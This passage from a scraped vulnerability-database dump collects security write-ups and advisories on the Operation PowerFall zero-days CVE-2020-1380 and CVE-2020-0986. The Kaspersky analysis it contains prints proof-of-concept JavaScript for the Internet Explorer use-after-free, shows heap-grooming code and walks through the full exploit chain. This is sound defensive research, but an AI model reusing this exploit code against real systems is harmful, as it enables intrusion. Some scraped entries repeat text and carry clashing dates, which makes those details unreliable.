APT attacks with recent examples including Transparent Tribe and Origami Elephant.\n * While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT groups.\n * Unsurprisingly, we continue to see COVID-19-themed attacks \u2013 this quarter they included WellMess and Sidewinder.\n * Among the most interesting APT 
campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading-edge in malware development.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2020-11-03T10:00:37", "published": "2020-11-03T10:00:37", "id": "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "href": "https://securelist.com/apt-trends-report-q3-2020/99204/", "type": "securelist", "title": "APT trends report Q3 2020", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-13T08:04:21", "bulletinFamily": "blog", "cvelist": ["CVE-2018-8653", "CVE-2019-0676", "CVE-2019-1429", "CVE-2020-0674", "CVE-2020-0986", "CVE-2020-1380"], "description": "\n\n## Executive summary\n\nIn May 2020, Kaspersky technologies prevented an attack on a South Korean company by a malicious script for Internet Explorer. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer and an elevation of privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium, the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build [18363](<https://docs.microsoft.com/en-us/windows/release-information/>) x64.\n\nOn June 8, 2020, we reported our discoveries to Microsoft, and the company confirmed the vulnerabilities. 
At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability [CVE-2020-0986](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986>) that was used in the zero-day elevation of privilege exploit, but before our discovery, the exploitability of this vulnerability was considered less likely. The patch for CVE-2020-0986 was released on June 9, 2020.\n\nMicrosoft assigned [CVE-2020-1380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1380>) to a use-after-free vulnerability in JScript and the patch was released on August 11, 2020. \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/12070837/CVE-2020-1380_list.png>)\n\nWe are calling this and related attacks 'Operation PowerFall'. Currently, we are unable to establish a definitive link with any known threat actors, but due to similarities with previously discovered exploits, we believe that [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) may be behind this attack. Kaspersky products detect Operation PowerFall attacks with verdict PDM:Exploit.Win32.Generic.\n\n## Internet Explorer 11 remote code execution exploit\n\nThe most recent zero-day exploits for Internet Explorer discovered in the wild relied on the vulnerabilities CVE-2020-0674, CVE-2019-1429, CVE-2019-0676 and CVE-2018-8653 in the legacy JavaScript engine jscript.dll. In contrast, CVE-2020-1380 is a vulnerability in jscript9.dll, which has been used by default starting with Internet Explorer 9, and because of this, the [mitigation steps](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001>) recommended by Microsoft (restricting the usage of jscript.dll) cannot protect against this particular vulnerability.\n\nCVE-2020-1380 is a Use-After-Free vulnerability that is caused by JIT optimization and the lack of necessary checks in just-in-time compiled code. 
A proof-of-concept (PoC) that triggers the vulnerability is demonstrated below:\n \n \n function func(O, A, F, O2) {\n arguments.push = Array.prototype.push;\n O = 1;\n arguments.length = 0;\n arguments.push(O2);\n if (F == 1) {\n O = 2;\n }\n \n // execute abp.valueOf() and write by dangling pointer\n A[5] = O;\n };\n \n // prepare objects\n var an = new ArrayBuffer(0x8c);\n var fa = new Float32Array(an);\n \n // compile func\n func(1, fa, 1, {});\n for (var i = 0; i < 0x10000; i++) {\n func(1, fa, 1, 1);\n }\n \n var abp = {};\n abp.valueOf = function() {\n \n // free \n worker = new Worker('worker.js');\n worker.postMessage(an, [an]);\n worker.terminate();\n worker = null;\n \n // sleep\n var start = Date.now();\n while (Date.now() - start < 200) {}\n \n // TODO: reclaim freed memory\n \n return 0\n };\n \n try {\n func(1, fa, 0, abp);\n } catch (e) {\n reload()\n }\n\nTo understand this vulnerability, let us take a look at how _func()_ is executed. It is important to understand what value is set to _A[5]_. According to the code, it should be an _O_ argument. At function start, the _O_ argument is re-assigned to 1, but then the function arguments length is set to 0. This operation does not clear function arguments (as it would normally do with a regular array) but allows argument _O2_ to be put into the arguments list at index zero using Array.prototype.push, meaning _O_ = _O2_ now. Besides that, if the argument _F_ is equal to 1, then _O_ will be re-assigned once again, but to the integer number 2. It means that depending on the value of the _F_ argument, the _O_ argument is equal to either the value of the _O2_ argument or the integer number 2. The argument _A_ is a typed array of 32-bit floating point numbers, and before assigning a value to index 5 of the array, this value should be converted to a float. Converting an integer to a float is a relatively simple task, but it becomes less straightforward when an object is converted to a float number. 
The exploit uses the object _abp_ with an overridden _valueOf()_ method. This method is executed when the object is converted to a float, but inside the method there is code that frees ArrayBuffer, which is viewed by Float32Array and where the returned value will be set. To prevent the value from being stored in the memory of the freed object, the JavaScript engine needs to check the status of the object before storing the value in it. To convert and store the float value safely, JScript9.dll uses the function _Js::TypedArray<float,0>::BaseTypedDirectSetItem()_. You can see the decompiled code of this function below:\n \n \n int Js::TypedArray<float,0>::BaseTypedDirectSetItem(Js::TypedArray<float,0> *this, unsigned int index, void *object, int reserved)\n {\n Js::JavascriptConversion::ToNumber(object, this->type->library->context);\n if ( LOBYTE(this->view[0]->unusable) )\n Js::JavascriptError::ThrowTypeError(this->type->library->context, 0x800A15E4, 0);\n if ( index < this->count )\n {\n *(float *)&this->buffer[4 * index] = Js::JavascriptConversion::ToNumber(\n object,\n this->type->library->context);\n }\n return 1;\n }\n \n double Js::JavascriptConversion::ToNumber(void *object, struct Js::ScriptContext *context)\n {\n if ( (unsigned char)object & 1 )\n return (double)((int)object >> 1);\n if ( *(void **)object == VirtualTableInfo<Js::JavascriptNumber>::Address[0] )\n return *((double *)object + 1);\n return Js::JavascriptConversion::ToNumber_Full(object, context);\n }\n\nThis function checks the _view[0]->unusable_ and _count_ fields of the typed float array and when ArrayBuffer is freed during execution of the _valueOf()_ method, both of these checks will fail because _view[0]->unusable_ will be set to 1 and _count_ will be set to 0 during the first call to _Js::JavascriptConversion::ToNumber()_. 
The problem lies in the fact that the function _Js::TypedArray<float,0>::BaseTypedDirectSetItem()_ is used only in interpretation mode.\n\nWhen the function _func()_ is compiled just in time, the JavaScript engine will use the vulnerable code below.\n \n \n if ( !((unsigned char)floatArray & 1) && *(void *)floatArray == &Js::TypedArray<float,0>::vftable )\n {\n if ( floatArray->count > index )\n {\n buffer = floatArray->buffer + 4*index;\n if ( object & 1 )\n {\n *(float *)buffer = (double)(object >> 1);\n }\n else\n {\n if ( *(void *)object != &Js::JavascriptNumber::vftable )\n {\n Js::JavascriptConversion::ToFloat_Helper(object, (float *)buffer, context);\n }\n else\n {\n *(float *)buffer = *(double *)(object->value);\n }\n }\n }\n }\n\nAnd here is the code of the _Js::JavascriptConversion::ToFloat_Helper()_ function.\n \n \n void Js::JavascriptConversion::ToFloat_Helper(void *object, float *buffer, struct Js::ScriptContext *context)\n {\n *buffer = Js::JavascriptConversion::ToNumber_Full(object, context);\n }\n\nAs you can see, unlike in interpretation mode, in just-in-time compiled code, the life cycle of ArrayBuffer is not checked, and its memory can be freed and then reclaimed during a call to the _valueOf()_ function. Additionally, the attacker can control at what index the returned value is written. However, in the case when "arguments.length = 0;" and "arguments.push(O2);" are replaced in the PoC with "arguments[0] = O2;" then _Js::JavascriptConversion::ToFloat_Helper()_ will not trigger the bug because implicit calls will be disabled and it will not perform a call to the _valueOf()_ function.\n\nTo ensure that the function _func()_ is compiled just in time, the exploit executes this function 0x10000 times, performing a harmless conversion of the integer, and only after that _func()_ is executed once more, triggering the bug. To free ArrayBuffer, the exploit uses a common technique abusing the Web Workers API. 
The function _postMessage()_ can be used to serialize objects to messages and send them to the worker. As a side effect, transferred objects are freed and become unusable in the current script context. When ArrayBuffer is freed, the exploit triggers garbage collection via code that simulates the use of the _Sleep()_ function: it is a while loop that checks for the time lapse between _Date.now()_ and the previously stored value. After that, the exploit reclaims the memory with integer arrays.\n \n \n for (var i = 0; i < T.length; i += 1) {\n T[i] = new Array((0x1000 - 0x20) / 4);\n T[i][0] = 0x666; // item needs to be set to allocate LargeHeapBucket\n }\n\nWhen a large number of arrays is created, Internet Explorer allocates new LargeHeapBlock objects, which are used by IE's custom heap implementation. The LargeHeapBlock objects will store the addresses of buffers allocated for the arrays. If the expected memory layout is achieved successfully, the vulnerability will overwrite the value at the offset 0x14 of LargeHeapBlock with 0, which happens to be the allocated block count.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/03155654/sl_ie11_and_windows_01.png>)\n\n**_LargeHeapBlock structure for jscript9.dll x86_**\n\nAfter that, the exploit allocates a huge number of arrays and sets them to another array that was prepared at the initial stage of the exploitation. Then this array is set to null, and the exploit makes a call to the _CollectGarbage()_ function. This results in defragmentation of the heap, and the modified LargeHeapBlock will be freed along with its associated array buffers. At this stage, the exploit creates a large number of integer arrays in hopes of reclaiming the previously freed array buffers. 
The newly created arrays have a magic value set at index zero, and this value is checked through a dangling pointer to the previously freed array to detect if the exploitation was successful.\n \n \n for (var i = 0; i < K.length; i += 1) {\n K[i] = new Array((0x1000 - 0x20) / 4);\n K[i][0] = 0x888; // store magic\n }\n \n for (var i = 0; i < T.length; i += 1) {\n if (T[i][0] == 0x888) { // find array accessible through dangling pointer\n R = T[i];\n break;\n }\n }\n\nAs a result, the exploit creates two different JavascriptNativeIntArray objects with buffers pointing to the same location. This makes it possible to retrieve the addresses of the objects and even create new malformed objects. The exploit takes advantage of these primitives to create a malformed DataView object and get read/write access to the whole address space of the process.\n\nAfter building the arbitrary read/write primitives, it is time to bypass Control Flow Guard (CFG) and get code execution. The exploit uses the Array's vftable pointer to get the module base address of jscript9.dll. From there, it parses the PE header of jscript9.dll to get the address of the Import Directory Table and resolves the base addresses of the other modules. The goal here is to find the address of the function _VirtualProtect()_, which will be used to make the shellcode executable. After that, the exploit searches for two signatures in jscript9.dll. Those signatures correspond to the address of the Unicode string "split" and the address of the function _JsUtil::DoublyLinkedListElement<ThreadContext>::LinkToBeginning<ThreadContext>()_. The address of the Unicode string "split" is used to get a code reference to the string and with its help, to resolve the address of the function _Js::JavascriptString::EntrySplit()_, which implements the string method _split()_. 
The address of the function _LinkToBeginning<ThreadContext>()_ is used to obtain the address of the first ThreadContext object in the global linked list. The exploit locates the last entry in the linked list and uses it to get the location of the stack for the thread responsible for the execution of the script. After that comes the final stage. The exploit executes the _split()_ method and an object with an overridden _valueOf()_ method is provided as a _limit_ argument. When the overridden _valueOf()_ method is executed during the execution of the function _Js::JavascriptString::EntrySplit()_, the exploit will search the thread's stack to find the return address, place the shellcode in a prepared buffer, obtain its address, and finally build a return-oriented programming (ROP) chain to execute the shellcode by overwriting the return address of the function.\n\n## Next stage\n\nThe shellcode is a reflective DLL loader for the portable executable (PE) module that is appended to the shellcode. The module is very small in size, and the whole functionality is located inside a single function. It creates a file within a temporary folder with the name ok.exe and writes to it the contents of another executable that is present in the remote code execution exploit. After that, ok.exe is executed.\n\nThe ok.exe executable is an elevation of privilege exploit for the arbitrary pointer dereference vulnerability CVE-2020-0986 in the GDI Print / Print Spooler API. Initially, this vulnerability was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative back in December 2019. Because no patch had been released in the six months since the original report, ZDI posted a public [advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) for this vulnerability as a zero-day on May 19, 2020. 
The next day, the vulnerability was exploited in the previously mentioned attack.\n\nThe vulnerability makes it possible to read and write the arbitrary memory of the splwow64.exe process using interprocess communication, and use it to achieve code execution in the splwow64.exe process, bypassing the CFG and [EncodePointer](<https://docs.microsoft.com/en-us/previous-versions/bb432254\\(v=vs.85\\)>) protection. The exploit comes with two executables embedded in its resources. The first executable is written to disk as CreateDC.exe and is used to create a device context (DC), which is required for exploitation. The second executable has the name PoPc.dll and if the exploitation is successful, it is executed by splwow64.exe with a medium integrity level. We will provide further details on CVE-2020-0986 and its exploitation in a follow-up post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/03155838/sl_ie11_and_windows_02.png>)\n\n**_Execution of a malicious PowerShell command from splwow64.exe_**\n\nThe main functionality of PoPc.dll is also located inside a single function. It executes an encoded PowerShell command that proceeds to download a file from www[.]static-cdn1[.]com/update.zip, saves it to the temporary folder as upgrader.exe and executes it. 
We were unable to analyze upgrader.exe because Kaspersky technologies prevented the attack before the executable was downloaded.\n\n## IoCs\n\n[www[.]static-cdn1[.]com/update.zip](<https://opentip.kaspersky.com/www.static-cdn1.com%2Fupdate.zip/>) \n[B06F1F2D3C016D13307BC7CE47C90594](<https://opentip.kaspersky.com/B06F1F2D3C016D13307BC7CE47C90594/>) \n[D02632CFFC18194107CC5BF76AECA7E87E9082FED64A535722AD4502A4D51199](<https://opentip.kaspersky.com/D02632CFFC18194107CC5BF76AECA7E87E9082FED64A535722AD4502A4D51199/>) \n[5877EAECA1FE8A3A15D6C8C5D7FA240B](<https://opentip.kaspersky.com/5877EAECA1FE8A3A15D6C8C5D7FA240B/>) \n[7577E42177ED7FC811DE4BC854EC226EB037F797C3B114E163940A86FD8B078B](<https://opentip.kaspersky.com/7577E42177ED7FC811DE4BC854EC226EB037F797C3B114E163940A86FD8B078B/>) \n[B72731B699922608FF3844CCC8FC36B4](<https://opentip.kaspersky.com/B72731B699922608FF3844CCC8FC36B4/>) \n[7765F836D2D049127A25376165B1AC43CD109D8B9D8C5396B8DA91ADC61ECCB1](<https://opentip.kaspersky.com/7765F836D2D049127A25376165B1AC43CD109D8B9D8C5396B8DA91ADC61ECCB1/>) \n[E01254D7AF1D044E555032E1F78FF38F](<https://opentip.kaspersky.com/E01254D7AF1D044E555032E1F78FF38F/>) \n[81D07CAE45CAF27CBB9A1717B08B3AB358B647397F08A6F9C7652D00DBF2AE24](<https://opentip.kaspersky.com/81D07CAE45CAF27CBB9A1717B08B3AB358B647397F08A6F9C7652D00DBF2AE24/>)", "modified": "2020-08-12T07:00:28", "published": "2020-08-12T07:00:28", "id": "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D", "href": "https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/", "type": "securelist", "title": "Internet Explorer and Windows zero-day exploits used in Operation PowerFall", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-01-14T21:07:38", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", 
"CVE-2020-1307", "CVE-2020-1316", "CVE-2020-17008", "CVE-2021-1648"], "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka \u2018Windows Kernel Elevation of Privilege Vulnerability\u2019. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at December 28, 2020 5:15pm UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the splwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. 
That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 4\n\n**gwillcox-r7** at November 22, 2020 2:32am UTC reported:\n\nGoogle Project Zero researcher Maddie Stone, who originally [disclosed this vulnerability](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) to Microsoft, [reported on December 23, 2020](<https://twitter.com/maddiestone/status/1341781305126612995>) that the patch is incomplete and can be bypassed.\n\nQuoting her [post here](<https://twitter.com/maddiestone/status/1341781306766573568>): \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u201cfix\u201d simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nStealing directly from a conversation with Metasploit\u2019s Windows exploit expert **@zeroSteiner**, it sounds like this bug isn\u2019t terribly useful as an LPE \u201cbecause the splwow64 process doesn\u2019t run with elevated privileges\u2014just an elevated integrity, which Microsoft doesn\u2019t consider a security boundary anymore anyway.\u201d Project Zero-reported vulns tend to draw media and researcher attention and there\u2019s quite a lot of detail publicly available between Stone\u2019s original report and this in-depth [Kaspersky write-up](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>), so we may see more exploitation even if the impact of the bug by itself isn\u2019t terribly high. 
That said, the Kaspersky analysis is definitely worth a read if you want to understand this CVE\u2019s utility for the IE 11 use case!\n", "modified": "2020-07-24T00:00:00", "published": "2020-06-09T00:00:00", "id": "AKB:0E829C08-804A-436D-A730-1B474A82E4A7", "href": "https://attackerkb.com/topics/bQeeJLG1aP/cve-2020-0986", "type": "attackerkb", "title": "CVE-2020-0986", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:42:06", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986"], "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute code in the context of the current user at medium integrity.", "edition": 1, "modified": "2020-06-22T00:00:00", "published": "2020-05-19T00:00:00", "id": "ZDI-20-663", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-663/", "title": "(0Day) Microsoft Windows splwow64 Untrusted Pointer Dereference Privilege Escalation Vulnerability", "type": "zdi", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2020-08-07T11:45:29", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0986"], "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "edition": 2, "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-0986", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986", "published": "2020-06-09T07:00:00", "title": "Windows Kernel Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2020-12-28T06:21:40", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986", "CVE-2020-17008"], "description": "Google's Project Zero team has made public details of an improperly patched zero-day security vulnerability in Windows print spooler API that could be leveraged by a bad actor to execute arbitrary code.\n\nDetails of the unpatched flaw were revealed publicly after Microsoft failed to rectify it within 90 days of responsible disclosure on September 24.\n\nOriginally tracked as [CVE-2020-0986](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0986.html>), the flaw concerns an elevation of privilege exploit in the GDI Print / [Print Spooler](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-printing>) API (\"splwow64.exe\") that was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative (ZDI) back in late December 2019.\n\nBut with no patch in sight for about six months, ZDI ended up posting a public [advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) as a zero-day 
on May 19 earlier this year, after which it was [exploited](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) in the wild in a campaign dubbed \"[Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>)\" against an unnamed South Korean company.\n\n\"splwow64.exe\" is a Windows core system binary that allows 32-bit applications to connect with the 64-bit printer spooler service on 64-bit Windows systems. It implements a Local Procedure Call ([LPC](<https://en.wikipedia.org/wiki/Local_Inter-Process_Communication>)) server that can be used by other processes to access printing functions.\n\nSuccessful exploitation of this vulnerability could result in an attacker manipulating the memory of the \"splwow64.exe\" process to achieve execution of arbitrary code in kernel mode, ultimately using it to install malicious programs; view, change, or delete data; or create new accounts with full user rights.\n\nHowever, to achieve this, the adversary would first have to log on to the target system in question.\n\nAlthough Microsoft eventually [addressed](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) the shortcoming as part of its June Patch Tuesday update, new findings from Google's security team reveal that the flaw has not been fully remediated.\n\n\"The vulnerability still exists, just the exploitation method had to change,\" Google Project Zero researcher Maddie Stone [said](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) in a write-up.\n\n\"The original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy,\" Stone [detailed](<https://twitter.com/maddiestone/status/1341781305126612995>). 
\"The 'fix' simply changed the pointers to offsets, which still allows control of the args to the memcpy.\"\n\nThe newly reported elevation of privilege flaw, identified as CVE-2020-17008, is expected to be resolved by Microsoft on January 12, 2021, due to \"issues identified in testing\" after promising an initial fix in November.\n\nStone has also shared proof-of-concept (PoC) exploit code for CVE-2020-17008, based on a PoC released by Kaspersky for CVE-2020-0986.\n\n\"There have been too many occurrences this year of zero-days known to be actively exploited being fixed incorrectly or incompletely,\" Stone [said](<https://twitter.com/maddiestone/status/1341781305126612995>). \"When [in the wild] zero-days aren't fixed completely, attackers can reuse their knowledge of vulnerabilities and exploit methods to easily develop new zero-days.\"\n", "modified": "2020-12-28T06:17:30", "published": "2020-12-24T09:01:00", "id": "THN:279CDD851D8F33C8B07217F8D20F6AAA", "href": "https://thehackernews.com/2020/12/google-discloses-poorly-patched-now.html", "type": "thn", "title": "Google Discloses Poorly-Patched, Now Unpatched, Windows 0-Day Bug", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-12-24T21:57:52", "bulletinFamily": "info", "cvelist": ["CVE-2020-0986", "CVE-2020-17008"], "description": "A high-severity Windows zero-day that could lead to complete desktop takeover remains dangerous after a \u201cfix\u201d from Microsoft failed to adequately patch it.\n\nThe local privilege-escalation bug in Windows 8.1 and Windows 10 (CVE-2020-0986) exists in the Print Spooler API. 
It could allow a local attacker to elevate privileges and execute code in the context of the current user, according to [Microsoft\u2019s advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986>) issued in June. An attacker would first have to log on to the system, but could then run a specially crafted application to take control of an affected system.\n\n\u201cThe issue arises because the Windows kernel fails to properly handle objects in memory,\u201d the firm said. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nThe bug rates 8.3 out of 10 on the CVSS vulnerability-severity scale.\n\nFrom a more technical perspective, \u201cthe specific flaw exists within the user-mode printer driver host process splwow64.exe,\u201d according to [an advisory](<https://www.zerodayinitiative.com/advisories/ZDI-20-663/>) from Trend Micro\u2019s Zero Day Initiative (ZDI), which reported the bug to Microsoft last December. \u201cThe issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer.\u201d\n\nThe issue remained unpatched for six months. In the meantime, Kaspersky observed it being [exploited in the wild](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>) in May against a South Korean company, as part of an exploit chain that also used a remote code-execution zero-day bug in Internet Explorer. 
That campaign, dubbed Operation Powerfall, was believed to be initiated by the advanced persistent threat (APT) [known as Darkhotel](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>).\n\nMicrosoft\u2019s June update included a patch that \u201caddresses the vulnerability by correcting how the Windows kernel handles objects in memory.\u201d However, Maddie Stone, researcher with Google Project Zero, has now disclosed that the fix was faulty, after Microsoft failed to re-patch it within 90 days of being alerted to the problem.\n\n\u201cMicrosoft released a patch in June, but that patch didn\u2019t fix the vuln,\u201d [she tweeted](<https://twitter.com/maddiestone/status/1341781306766573568>) on Wednesday. \u201cAfter reporting that bad fix in Sept. under a 90-day deadline, it\u2019s still not fixed.\u201d\n\nShe added, \u201cThe original issue was an arbitrary pointer dereference which allowed the attacker to control the src and dest pointers to a memcpy. The \u2018fix\u2019 simply changed the pointers to offsets, which still allows control of the args to the memcpy.\u201d\n\nMicrosoft has issued a new CVE, [CVE-2020-17008](<https://www.cybersecurity-help.cz/vdb/SB2020122401>), and researchers expect a patch in January. Project Zero meanwhile has issued [public proof-of-concept code](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) for the issue.\n", "modified": "2020-12-24T16:31:38", "published": "2020-12-24T16:31:38", "id": "THREATPOST:52B00377F0B400F0EFF0B3C4FF948F6F", "href": "https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/", "type": "threatpost", "title": "Windows Zero-Day Still Circulating After Faulty Fix", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-07-21T19:51:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1247", "CVE-2020-1246", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1291", "CVE-2020-1260"], "description": "This host is missing a critical security\n update according to Microsoft KB4561612", "modified": "2020-07-16T00:00:00", "published": "2020-06-10T00:00:00", "id": "OPENVAS:1361412562310817063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817063", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4561612)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# 
SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817063\");\n script_version(\"2020-07-16T11:59:37+0000\");\n script_cve_id(\"CVE-2020-0915\", \"CVE-2020-0916\", \"CVE-2020-0986\", \"CVE-2020-1160\",\n \"CVE-2020-1194\", \"CVE-2020-1196\", \"CVE-2020-1207\", \"CVE-2020-1208\",\n \"CVE-2020-1212\", \"CVE-2020-1213\", \"CVE-2020-1214\", \"CVE-2020-1215\",\n \"CVE-2020-1216\", \"CVE-2020-1219\", \"CVE-2020-1220\", \"CVE-2020-1230\",\n \"CVE-2020-1231\", \"CVE-2020-1236\", \"CVE-2020-1239\", \"CVE-2020-1246\",\n \"CVE-2020-1247\", \"CVE-2020-1251\", \"CVE-2020-1253\", \"CVE-2020-1254\",\n \"CVE-2020-1255\", \"CVE-2020-1260\", \"CVE-2020-1262\", \"CVE-2020-1263\",\n \"CVE-2020-1270\", \"CVE-2020-1272\", \"CVE-2020-1281\", \"CVE-2020-1282\",\n \"CVE-2020-1287\", \"CVE-2020-1291\", \"CVE-2020-1299\", \"CVE-2020-1300\",\n 